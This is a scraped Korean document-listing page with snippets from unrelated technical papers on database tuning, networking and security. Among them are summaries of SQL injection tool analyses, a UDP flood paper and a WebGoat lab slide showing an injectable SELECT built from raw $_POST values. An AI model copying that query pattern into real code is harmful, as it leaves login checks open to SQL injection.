Web Windows NT/2000 Server DP&NM Lab 1 Contents 2 Windows NT Service Provider Management Application Web UI 3 . PC,, Client/Server Network 4 (1),,, PC Mainframe PC Backbone Server TCP/IP DCS PLC Network
More informationCommit_Wait / Commit_Logging 두파라미터를통해 Log File Sync 대기시간을감소시킬수있다는것은놀라움과의아함을동시에느낄수있다. 단지파라미터의수정을통해당연히대기해야하는시간을감축한다는것은분명성능을개선해야하는입장에서는놀라운일이될것이다. 반면, 그에따
Commit Wait Class 대기시간감소방안 엑셈컨설팅본부 /DB 컨설팅팀박준연 개요 Wait Class 중 Commit 카테고리에해당하는 Wait Event 에의한대기현상으로 DB 시스템의성능저하현상이발생하는것은종종경험할수있다. 그중대표적인 Wait Event 는 Log File Sync 이다. 실제로대부분의 DB 시스템의 Top 5 Wait Event
More information1217 WebTrafMon II
(1/28) (2/28) (10 Mbps ) Video, Audio. (3/28) 10 ~ 15 ( : telnet, ftp ),, (4/28) UDP/TCP (5/28) centralized environment packet header information analysis network traffic data, capture presentation network
More information6주차.key
6, Process concept A program in execution Program code PCB (process control block) Program counter, registers, etc. Stack Heap Data section => global variable Process in memory Process state New Running
More informationthesis
CORBA TMN Surveillance System DPNM Lab, GSIT, POSTECH Email: mnd@postech.ac.kr Contents Motivation & Goal Related Work CORBA TMN Surveillance System Implementation Conclusion & Future Work 2 Motivation
More information개요오라클과티베로에서 JDBC 를통해접속한세션을구분할수있도록 JDBC 접속시 ConnectionProperties 를통해구분자를넣어줄수있다. 하나의 Node 에다수의 WAS 가있을경우 DB 에서 Session Kill 등의동작수행시원하는 Session 을선택할수있다.
설치및환경설정 JDBC 접속세션구분 / 확인 2013. 11. 01 개요오라클과티베로에서 JDBC 를통해접속한세션을구분할수있도록 JDBC 접속시 ConnectionProperties 를통해구분자를넣어줄수있다. 하나의 Node 에다수의 WAS 가있을경우 DB 에서 Session Kill 등의동작수행시원하는 Session 을선택할수있다. 사용하기 JEUS 에서설정방법
More informationALTIBASE HDB Patch Notes
ALTIBASE HDB 5.3.3.93 Patch Notes Table of Contents BUG-27950 ALL PRIVILEGES 권한을가진계정이다른계정의테이블에 Foreign Key 를 생성하지못한다. 3 BUG-38105 PASSWORD_LIFE_TIME 경과후유예기간 (PASSWORD_GRACE_TIME) 내에 접속을시도할경우알림메시지를발생해야한다.
More informationuntitled
(shared) (integrated) (stored) (operational) (data) : (DBMS) :, (database) :DBMS File & Database - : - : ( : ) - : - : - :, - DB - - -DBMScatalog meta-data -DBMS -DBMS - -DBMS concurrency control E-R,
More informationUDP Flooding Attack 공격과 방어
황 교 국 (fullc0de@gmail.com) SK Infosec Co., Inc MSS Biz. Security Center Table of Contents 1. 소개...3 2. 공격 관련 Protocols Overview...3 2.1. UDP Protocol...3 2.2. ICMP Protocol...4 3. UDP Flood Test Environment...5
More informationJerry Held
DB / TSC Oracle Database 10g (Self-Managing Database) (Common Infrastructure) (Automatic Workload Repository) (Server-generated Alerts) (Automated Maintenance Tasks) (Advisory Framework) (ADDM) (Self-Managing
More informationPowerPoint 프레젠테이션
Reasons for Poor Performance Programs 60% Design 20% System 2.5% Database 17.5% Source: ORACLE Performance Tuning 1 SMS TOOL DBA Monitoring TOOL Administration TOOL Performance Insight Backup SQL TUNING
More informationuntitled
PowerBuilder 連 Microsoft SQL Server database PB10.0 PB9.0 若 Microsoft SQL Server 料 database Profile MSS 料 (Microsoft SQL Server database interface) 行了 PB10.0 了 Sybase 不 Microsoft 料 了 SQL Server 料 PB10.0
More information슬라이드 1
Tadpole for DB 1. 도구개요 2. 설치및실행 4. 활용예제 1. 도구개요 도구명 소개 Tadpole for DB Tools (sites.google.com/site/tadpolefordb/) 웹기반의데이터베이스를관리하는도구 Database 스키마및데이터관리 라이선스 LGPL (Lesser General Public License) 특징 주요기능
More informationETL_project_best_practice1.ppt
ETL ETL Data,., Data Warehouse DataData Warehouse ETL tool/system: ETL, ETL Process Data Warehouse Platform Database, Access Method Data Source Data Operational Data Near Real-Time Data Modeling Refresh/Replication
More information제20회_해킹방지워크샵_(이재석)
IoT DDoS DNS (jaeseog@sherpain.net) (www.sherpain.net) DDoS DNS DDoS / DDoS(Distributed DoS)? B Asia Broadband B Bots connect to a C&C to create an overlay network (botnet) C&C Provider JP Corp. Bye Bye!
More informationCD-RW_Advanced.PDF
HP CD-Writer Program User Guide - - Ver. 2.0 HP CD-RW Adaptec Easy CD Creator Copier, Direct CD. HP CD-RW,. Easy CD Creator 3.5C, Direct CD 3.0., HP. HP CD-RW TEAM ( 02-3270-0803 ) < > 1. CD...3 CD...5
More informationPRO1_09E [읽기 전용]
Siemens AG 1999 All rights reserved File: PRO1_09E1 Information and - ( ) 2 3 4 5 Monitor/Modify Variables" 6 7 8 9 10 11 CPU 12 Stop 13 (Forcing) 14 (1) 15 (2) 16 : 17 : Stop 18 : 19 : (Forcing) 20 :
More information배치프로그램에서튜닝대상 SQL 추출하기 엑셈컨설팅본부 /DB 컨설팅팀박성호 배치프로그램의성능문제를진단하기위해트레이스를사용할수없고, 개별 SQL 에대한성 능점검은비효율적인경우에어떻게배치프로그램의성능문제를제대로파악하고개선안을도 출할것인가? 복잡한로직을가지고있는프로그램 (
배치프로그램에서튜닝대상 SQL 추출하기 엑셈컨설팅본부 /DB 컨설팅팀박성호 배치프로그램의성능문제를진단하기위해트레이스를사용할수없고, 개별 SQL 에대한성 능점검은비효율적인경우에어떻게배치프로그램의성능문제를제대로파악하고개선안을도 출할것인가? 복잡한로직을가지고있는프로그램 ( 이후배치프로그램 ) 에대한성능문제를파악하기위해수행되는모든 SQL 에대한개별수행내역을정확히판단할수있어야한다.
More informationSKINFOSEC-CHR-028-ASP Mssql Cookie Sql Injection Tool 분석 보고서.doc
Asp Mssql Sql Injection Tool 분석보고서 이재곤 (x0saver@gmail.com) SK Infosec Co., Inc MSS 사업본부 / 침해대응센터모의해킹파트 Table of Contents 1. 개요... 3 2. 구성... 3 3. 분석... 4 3.1. 기능분석... 4 4. 공격원리...14 4.1 기본공격원리...14 4.2
More informationConnection 8 22 UniSQLConnection / / 9 3 UniSQL OID SET
135-080 679-4 13 02-3430-1200 1 2 11 2 12 2 2 8 21 Connection 8 22 UniSQLConnection 8 23 8 24 / / 9 3 UniSQL 11 31 OID 11 311 11 312 14 313 16 314 17 32 SET 19 321 20 322 23 323 24 33 GLO 26 331 GLO 26
More information윈도우시스템프로그래밍
데이터베이스및설계 MySQL 을위한 MFC 를사용한 ODBC 프로그래밍 2012.05.10. 오병우 컴퓨터공학과금오공과대학교 http://www.apmsetup.com 또는 http://www.mysql.com APM Setup 설치발표자료참조 Department of Computer Engineering 2 DB 에속한테이블보기 show tables; 에러발생
More informationMicrosoft Word - SQL튜닝_실습교재_.doc
* 실습환경 * 1. 오라클데이터베이스의튜닝실습을하기위해서는기본적인테이블과데이터가필요합니다. 다음과같은절차에의해환경설정을하십시오. 1) 강사가제공하는 Export 된파일 (scott.dmp) 을자신의 ORACLE 경로에저장하십시오. [C: ] cd C: ORACLE ORA92 BIN [C: ] dir scott.dmp scott.dmp 2) SYSTEM 사용자로접속하여
More informationMySQL-.. 1
MySQL- 기초 1 Jinseog Kim Dongguk University jinseog.kim@gmail.com 2017-08-25 Jinseog Kim Dongguk University jinseog.kim@gmail.com MySQL-기초 1 2017-08-25 1 / 18 SQL의 기초 SQL은 아래의 용도로 구성됨 데이터정의 언어(Data definition
More informationSK IoT IoT SK IoT onem2m OIC IoT onem2m LG IoT SK IoT KAIST NCSoft Yo Studio tidev kr 5 SK IoT DMB SK IoT A M LG SDS 6 OS API 7 ios API API BaaS Backend as a Service IoT IoT ThingPlug SK IoT SK M2M M2M
More informationCopyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs, including any oper
Windows Netra Blade X3-2B( Sun Netra X6270 M3 Blade) : E37790 01 2012 9 Copyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs,
More informationMicrosoft PowerPoint - 10Àå.ppt
10 장. DB 서버구축및운영 DBMS 의개념과용어를익힌다. 간단한 SQL 문법을학습한다. MySQL 서버를설치 / 운영한다. 관련용어 데이터 : 자료 테이블 : 데이터를표형식으로표현 레코드 : 테이블의행 필드또는컬럼 : 테이블의열 필드명 : 각필드의이름 데이터타입 : 각필드에입력할값의형식 학번이름주소연락처 관련용어 DB : 테이블의집합 DBMS : DB 들을관리하는소프트웨어
More informationResult Cache 동작원리및활용방안 엑셈컨설팅본부 /DB 컨설팅팀김철환 개요 ORACLE DBMS 를사용하는시스템에서 QUERY 성능은무엇보다중요한요소중하나이며그 성능과직접적인관련이있는것이 I/O 이다. 많은건수를 ACCESS 해야만원하는결과값을얻을수있는 QUER
Result Cache 동작원리및활용방안 엑셈컨설팅본부 /DB 컨설팅팀김철환 개요 ORACLE DBMS 를사용하는시스템에서 QUERY 성능은무엇보다중요한요소중하나이며그 성능과직접적인관련이있는것이 I/O 이다. 많은건수를 ACCESS 해야만원하는결과값을얻을수있는 QUERY 을실행하게된다면 BLOCK I/O 가많이발생하게된다. 이런이유로 QUERY 의성능은좋지못할것이다.
More informationBind Peeking 한계에따른 Adaptive Cursor Sharing 등장 엑셈컨설팅본부 /DB 컨설팅팀김철환 Bind Peeking 의한계 SQL 이최초실행되면 3 단계의과정을거치게되는데 Parsing 단계를거쳐 Execute 하고 Fetch 의과정을통해데이터
Bind Peeking 한계에따른 Adaptive Cursor Sharing 등장 엑셈컨설팅본부 /DB 컨설팅팀김철환 Bind Peeking 의한계 SQL 이최초실행되면 3 단계의과정을거치게되는데 Parsing 단계를거쳐 Execute 하고 Fetch 의과정을통해데이터를사용자에게전송하게되며 Parsing 단계에서실행계획이생성된다. Bind 변수를사용하는 SQL
More informationTablespace On-Offline 테이블스페이스 온라인/오프라인
2018/11/10 12:06 1/2 Tablespace On-Offline 테이블스페이스온라인 / 오프라인 목차 Tablespace On-Offline 테이블스페이스온라인 / 오프라인... 1 일반테이블스페이스 (TABLESPACE)... 1 일반테이블스페이스생성하기... 1 테이블스페이스조회하기... 1 테이블스페이스에데이터파일 (DATA FILE) 추가
More information쉽게 풀어쓴 C 프로그래밊
Power Java 제 27 장데이터베이스 프로그래밍 이번장에서학습할내용 자바와데이터베이스 데이터베이스의기초 SQL JDBC 를이용한프로그래밍 변경가능한결과집합 자바를통하여데이터베이스를사용하는방법을학습합니다. 자바와데이터베이스 JDBC(Java Database Connectivity) 는자바 API 의하나로서데이터베이스에연결하여서데이터베이스안의데이터에대하여검색하고데이터를변경할수있게한다.
More information문서 템플릿
HDSI 툴분석 [sql injection 기술명세서 ] Sql injection 기술명세서 Ver. 0.01 이문서는 sql injection 기술명세가범위입니다. Copyrights Copyright 2009 by CanvasTeam@SpeeDroot( 장경칩 ) All Rights Reserved. 장경칩의사전승인없이본내용의전부또는일부에대한복사, 전재,
More informationuntitled
Push... 2 Push... 4 Push... 5 Push... 13 Push... 15 1 FORCS Co., LTD A Leader of Enterprise e-business Solution Push (Daemon ), Push Push Observer. Push., Observer. Session. Thread Thread. Observer ID.
More information데이터베이스_오라클_부록(최종).indd
C httpwwworaclecomdownloads DownloadsJavaJavaSE C1 5JDK JDKJavaDevelopmentKit Eclipse IDE JavaSEJavaSE7u55JDKDOWNLOAD JavaSEDevelopmentKitAcceptLicenseAgreement OS jdk7u55windowsi586exe7u55 version7update55windowsosi586os
More information제목을 입력하세요.
1. 4 1.1. SQLGate for Oracle? 4 1.2. 4 1.3. 5 1.4. 7 2. SQLGate for Oracle 9 2.1. 9 2.2. 10 2.3. 10 2.4. 13 3. SQLGate for Oracle 15 3.1. Connection 15 Connect 15 Multi Connect 17 Disconnect 18 3.2. Query
More informationePapyrus PDF Document
Goodus 기술노트 [38 회 ] Author 윤병길, 이은정 Creation Date 2009-02-27 Last Updated Version 1.0 Copyright(C) 2004 Goodus Inc. All Rights Reserved Version 변경일자변경자 ( 작성자 ) 주요내용 1 2009-02-27 윤병길, 이은정문서최초작성 Contents
More informationMicrosoft PowerPoint - 2.Catalyst Switch Intrastructure Protection_이충용_V1 0.ppt [호환 모드]
Catalyst Switch Infrastructure Protection Cisco Systems Korea SE 이충용 (choolee@cisco.com) Overview DoS (Denial of Service) 공격대상 - Server Resource - Network Resource - Network devices (Routers, Firewalls
More informationF1-1(수정).ppt
, thcho@kisaorkr IPAK (Information Protection Assessment Kit) IAM (INFOSEC Assessment Methodology) 4 VAF (Vulnerability Assessment Framework) 5 OCTAVE (Operationally Critical Threat, Asset, and Vulnerability
More informationTina Admin
유니원아이앤씨 DB 기술지원팀 2015 년 09 월 09 일 문서정보 프로젝트명 TTS (Transportable Tablespace) 서브시스템명 버전 1.0 문서명 TTS (Transportable Tablespace) 작성일 2015-08-16 작성자 김성한 최종수정일 2015-09-09 문서번호 UNIONE-201509091051-KSH 재개정이력 일자내용수정인버전
More informationPowerPoint Presentation
Server I/O utilization System I/O utilization V$FILESTAT V$DATAFILE Data files Statspack Performance tools TABLESPACE FILE_NAME PHYRDS PHYBLKRD READTIM PHYWRTS PHYBLKWRT WRITETIM ------------- -----------------------
More informationB _01_M_Korea.indb
DDX7039 B64-3602-00/01 (MV) SRC... 2 2 SRC % % % % 1 2 4 1 5 4 5 2 1 2 6 3 ALL 8 32 9 16:9 LB CD () : Folder : Audio fi SRC 0 0 0 1 2 3 4 5 6 3 SRC SRC 8 9 p q w e 1 2 3 4 5 6 7 SRC SRC SRC 1 2 3
More informationPortal_9iAS.ppt [읽기 전용]
Application Server iplatform Oracle9 A P P L I C A T I O N S E R V E R i Oracle9i Application Server e-business Portal Client Database Server e-business Portals B2C, B2B, B2E, WebsiteX B2Me GUI ID B2C
More information구축환경 OS : Windows 7 그외 OS 의경우교재 p26-40 참조 Windows 의다른버전은조금다르게나타날수있음 Browser : Google Chrome 다른브라우저를사용해도별차이없으나추후수업의모든과정은크롬사용 한
수업환경구축 웹데이터베이스구축및실습 구축환경 OS : Windows 7 그외 OS 의경우교재 p26-40 참조 Windows 의다른버전은조금다르게나타날수있음 Browser : Google Chrome 다른브라우저를사용해도별차이없으나추후수업의모든과정은크롬사용 http://chrome.google.com 한림대학교웹데이터베이스 - 이윤환 APM 설치 : AUTOSET6
More informationPWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS (
PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS (http://ddns.hanwha-security.com) Step 1~5. Step, PC, DVR Step 1. Cable Step
More information소개 TeraStation 을 구입해 주셔서 감사합니다! 이 사용 설명서는 TeraStation 구성 정보를 제공합니다. 제품은 계속 업데이트되므로, 이 설명서의 이미지 및 텍스트는 사용자가 보유 중인 TeraStation 에 표시 된 이미지 및 텍스트와 약간 다를 수
사용 설명서 TeraStation Pro II TS-HTGL/R5 패키지 내용물: 본체 (TeraStation) 이더넷 케이블 전원 케이블 TeraNavigator 설치 CD 사용 설명서 (이 설명서) 제품 보증서 www.buffalotech.com 소개 TeraStation 을 구입해 주셔서 감사합니다! 이 사용 설명서는 TeraStation 구성 정보를
More informationbn2019_2
arp -a Packet Logging/Editing Decode Buffer Capture Driver Logging: permanent storage of packets for offline analysis Decode: packets must be decoded to human readable form. Buffer: packets must temporarily
More informationOracle Database 10g: Self-Managing Database DB TSC
Oracle Database 10g: Self-Managing Database DB TSC Agenda Overview System Resource Application & SQL Storage Space Backup & Recovery ½ Cost ? 6% 12 % 6% 6% 55% : IOUG 2001 DBA Survey ? 6% & 12 % 6% 6%
More informationNetwork seminar.key
Intro to Network .. 2 4 ( ) ( ). ?!? ~! This is ~ ( ) /,,,???? TCP/IP Application Layer Transfer Layer Internet Layer Data Link Layer Physical Layer OSI 7 TCP/IP Application Layer Transfer Layer 3 4 Network
More informationPowerPoint Template
설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet
More informationMicrosoft Word - 05_SUBPROGRAM.doc
ORACLE SUBPROGRAM INTRODUCTION PLSQL 은오라클에서제공하는프로그래밍언어이다. 이는데이터베이스언어인 SQL 과함께효과적으로데이터베이스에접근할수있는방법을제공하고있다. Procedural LanguageSQL 의약자에서볼수있듯이절차적인기능을기본적으로가지는프로그래밍언어이다. PLSQL 은기본적으로블록 (BLOCK) 구조를가지고있다. 블록의기본적인구성은선언부
More information다양한 예제로 쉽게 배우는 오라클 SQL 과 PL/SQL
다양핚예제로쉽게배우는 오라클 SQL 과 PL/SQL 서진수저 10 장 view 를배웁니다 1 - View 란가상의테이블이다! 2 1. 단순 View (Simple View) SCOTT>CONN / AS SYSDBA; SYS>GRANT CREATE VIEW TO scott ; CREATE [OR REPLACE] [ FORCE NOFORCE] VIEW view
More information본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인
스마일서브 CLOUD_Virtual 워드프레스 설치 (WORDPRESS INSTALL) 스마일서브 가상화사업본부 Update. 2012. 09. 04. 본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게
More informationNo Slide Title
J2EE J2EE(Java 2 Enterprise Edition) (Web Services) :,, SOAP: Simple Object Access Protocol WSDL: Web Service Description Language UDDI: Universal Discovery, Description & Integration 4. (XML Protocol
More informationスライド タイトルなし
2 3 회사 소개 60%출자 40%출자 주식회사 NTT데이타 아이테크 NTT DATA의 영업협력이나 첨단기술제공, 인재육성등 여러가지 지원을 통해서 SII 그룹을 대상으로 고도의 정보 서비스를 제공 함과 동시에 NTT DATA ITEC 가 보유하고 있는 높은 업무 노하우 와 SCM을 비롯한 ERP분야의 기술력을 살려서 조립가공계 및 제조업 등 새로운 시장에
More informationMicrosoft Word - [Unioneinc] 특정컬럼의 통계정보 갱신_ _ldh.doc
특정 Column 통계정보갱신가이드 유니원아이앤씨 DB 사업부이대혁 2015 년 03 월 02 일 문서정보프로젝트명서브시스템명 버전 1.0 문서명 특정 Column 통계정보갱신가이드 작성일 2015-03-02 작성자 DB사업부이대혁사원 최종수정일 2015-03-02 문서번호 UNIONE-201503021500-LDH 재개정이력 일자내용수정인버전 문서배포이력
More information강의10
Computer Programming gdb and awk 12 th Lecture 김현철컴퓨터공학부서울대학교 순서 C Compiler and Linker 보충 Static vs Shared Libraries ( 계속 ) gdb awk Q&A Shared vs Static Libraries ( 계속 ) Advantage of Using Libraries Reduced
More information(Asynchronous Mode) ( 1, 5~8, 1~2) & (Parity) 1 ; * S erial Port (BIOS INT 14H) - 1 -
(Asynchronous Mode) - - - ( 1, 5~8, 1~2) & (Parity) 1 ; * S erial Port (BIOS INT 14H) - 1 - UART (Univ ers al As y nchronous Receiver / T rans mitter) 8250A 8250A { COM1(3F8H). - Line Control Register
More information@OneToOne(cascade = = "addr_id") private Addr addr; public Emp(String ename, Addr addr) { this.ename = ename; this.a
1 대 1 단방향, 주테이블에외래키실습 http://ojcedu.com, http://ojc.asia STS -> Spring Stater Project name : onetoone-1 SQL : JPA, MySQL 선택 http://ojc.asia/bbs/board.php?bo_table=lecspring&wr_id=524 ( 마리아 DB 설치는위 URL
More informationIntra_DW_Ch4.PDF
The Intranet Data Warehouse Richard Tanler Ch4 : Online Analytic Processing: From Data To Information 2000. 4. 14 All rights reserved OLAP OLAP OLAP OLAP OLAP OLAP is a label, rather than a technology
More informationFileMaker 15 ODBC 및 JDBC 설명서
FileMaker 15 ODBC JDBC 2004-2016 FileMaker, Inc.. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker FileMaker Go FileMaker, Inc.. FileMaker WebDirect FileMaker, Inc... FileMaker.
More information1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation
1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation Board(EVB B/D) 들과 TCP/IP Protocol로연결되며, 연결된 TCP/IP
More informationObservational Determinism for Concurrent Program Security
웹응용프로그램보안취약성 분석기구현 소프트웨어무결점센터 Workshop 2010. 8. 25 한국항공대학교, 안준선 1 소개 관련연구 Outline Input Validation Vulnerability 연구내용 Abstract Domain for Input Validation Implementation of Vulnerability Analyzer 기존연구
More informationPowerPoint Presentation
Data Protection Rapid Recovery x86 DR Agent based Backup - Physical Machine - Virtual Machine - Cluster Agentless Backup - VMware ESXi Deploy Agents - Windows - AD, ESXi Restore Machine - Live Recovery
More information윈도우시스템프로그래밍
데이타베이스 MySQL 을위한 MFC 를사용한 ODBC 프로그래밍 2013.05.15. 오병우 컴퓨터공학과금오공과대학교 http://www.apmsetup.com 또는 http://www.mysql.com APM Setup 설치발표자료참조 Department of Computer Engineering 2 DB 에속한테이블보기 show tables; 에러발생
More informationPowerPoint Presentation
FORENSIC INSIGHT; DIGITAL FORENSICS COMMUNITY IN KOREA SQL Server Forensic AhnLab A-FIRST Rea10ne unused6@gmail.com Choi Jinwon Contents 1. SQL Server Forensic 2. SQL Server Artifacts 3. Database Files
More informationAssign an IP Address and Access the Video Stream - Installation Guide
설치 안내서 IP 주소 할당 및 비디오 스트림에 액세스 책임 본 문서는 최대한 주의를 기울여 작성되었습니다. 잘못되거나 누락된 정보가 있는 경우 엑시스 지사로 알려 주시기 바랍니다. Axis Communications AB는 기술적 또는 인쇄상의 오류에 대해 책 임을 지지 않으며 사전 통지 없이 제품 및 설명서를 변경할 수 있습니다. Axis Communications
More information<30362E20C6EDC1FD2DB0EDBFB5B4EBB4D420BCF6C1A42E687770>
327 Journal of The Korea Institute of Information Security & Cryptology ISSN 1598-3986(Print) VOL.24, NO.2, Apr. 2014 ISSN 2288-2715(Online) http://dx.doi.org/10.13089/jkiisc.2014.24.2.327 개인정보 DB 암호화
More information그리고.. 엑셀에하나둘완료된쿼리가늘어날때마다... 희열을느낀다... 이글을보는당신은어떻게할것인가? A 군의판단이잘못된것인가? 잘못된판단이아니다최선의판단이다... 11g 전까지는... 11g New Feature 인 Pending Statistics 를 SPA 와함께사용
SPA(SQL Performance Analyze) 를이용한통계정보 수집 엑셈컨설팅본부 /DB 컨설팅팀오경렬 1. SPA 란? SPA(SQL Performance Analyze) 는 RAT(Real Application Testing) 서비스의옵션중에하나 이다. 본문서는 SPA 를이용해좀더안정적으로통계정보를생성하는 Process 에대해다룬다. 2. 통계정보와
More informationRemote UI Guide
Remote UI KOR Remote UI Remote UI PDF Adobe Reader/Adobe Acrobat Reader. Adobe Reader/Adobe Acrobat Reader Adobe Systems Incorporated.. Canon. Remote UI GIF Adobe Systems Incorporated Photoshop. ..........................................................
More informationPowerPoint Presentation
6 장 SQL (section 4-6) 목차 SECTION 01 SQL 의개요 1-1 SQL의역사 1-2 SQL의유형별종류 SECTION 02 데이터정의어 (DDL) 2-1 스키마 2-2 테이블생성 (CREATE TABLE) 2-3 테이블변경 (ALTER TABLE) 2-4 테이블제거 (DROP TABLE) 2-5 제약조건 SECTION 03 데이터조작어 (DML)
More informationJ2EE Concepts
! Introduction to J2EE (1) - J2EE Servlet/JSP/JDBC iseminar.. 1544-3355 ( ) iseminar Chat. 1 Who Are We? Business Solutions Consultant Oracle Application Server 10g Business Solutions Consultant Oracle10g
More information네트워크 안정성을 지켜줄 최고의 기술과 성능 TrusGuard는 국내 최초의 통합보안솔루션으로서 지난 5년간 약 4천여 고객 사이트에 구축 운영되면서 기술의 안정성과 성능면에서 철저한 시장 검증을 거쳤습니다. 또한 TrusGuard는 단독 기능 또는 복합 기능 구동 시
네트워크 보안도 안철수연구소입니다 통합 보안의 No.1 파트너, AhnLab TrusGuard 네트워크 환경을 수호하는 최고의 통합 보안 시스템 고성능 방화벽ㆍVPN Security 기술과 고품질 Integrated Security 기술의 강력한 결합 네트워크 안정성을 지켜줄 최고의 기술과 성능 TrusGuard는 국내 최초의 통합보안솔루션으로서 지난 5년간
More informationchapter4
Basic Netw rk 1. ก ก ก 2. 3. ก ก 4. ก 2 1. 2. 3. 4. ก 5. ก 6. ก ก 7. ก 3 ก ก ก ก (Mainframe) ก ก ก ก (Terminal) ก ก ก ก ก ก ก ก 4 ก (Dumb Terminal) ก ก ก ก Mainframe ก CPU ก ก ก ก 5 ก ก ก ก ก ก ก ก ก ก
More informationthesis
( Design and Implementation of a Generalized Management Information Repository Service for Network and System Management ) ssp@nile nile.postech.ac..ac.kr DPE Lab. 1997 12 16 GMIRS GMIRS GMIRS prototype
More information